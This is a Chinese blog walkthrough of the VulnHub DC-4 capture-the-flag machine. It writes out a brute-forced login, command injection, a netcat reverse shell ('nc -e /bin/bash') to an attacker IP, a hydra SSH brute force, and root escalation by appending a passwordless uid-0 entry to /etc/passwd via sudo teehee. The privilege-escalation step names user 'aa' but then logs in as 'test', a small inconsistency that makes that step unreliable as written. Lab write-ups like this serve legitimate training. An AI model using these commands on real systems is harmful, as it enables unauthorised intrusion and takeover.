DC-4

准备工作

在vulnhub官网下载DC:4靶机DC-4

信息收集

nmap -sV -p - -sS 192.168.1.12


访问80端口发现是一个登录页面
2.png

弱口令爆破

dirsearch 对目录进行扫描

dirseatch -u 192.168.1.12

3.png
没有什么可用信息

发现页面验证码,尝试弱口令爆破,根据页面提示大概可以确定用户名为admin

使用burp抓登录包
4.png
因为我们已经确定用户名所以只需要一个变量即可
5.png
6.png
根据返回长度可以看到happy就是密码,登陆到后台看看
7.png
发现可以执行命令抓包看看能否修改
8.png
可以看到成功执行pwd命令
看能否反弹shell

nc -e /bin/bash 192.168.1.8 4444
攻击机 nc -lvp 4444监听

9.png
此shell有缺陷,尝试使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

在jim文件中找到了密码的备份文件,使用hydra连接ssh进行爆破

hydra爆破

参数解释

-l 后面跟着 具体的用户名
-p 后面跟着 具体的密码
-L 后面跟着 用户字典
-P 后面跟着 密码字典

hydra -l jim -P passwd.txt ssh://192.168.1.12

11.png

尝试连接 ssh jim@192.168.1.12 -p 22

提示有邮件
查看获得charles的密码
13.png
登录成功,但是没有权限,查询有sudo权限的文件
14.png

权限提升

teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
linux中普通用户能临时使用root权限的命令,查看方式:

sudo -l

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目录

echo "aa::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su test就可以登录到test用户,这个用户因为uid为0,所以也是root权限。
15.png
成功拿到root权限

posted @ 2022-05-19 08:26  vir-k  阅读(193)  评论(0编辑  收藏  举报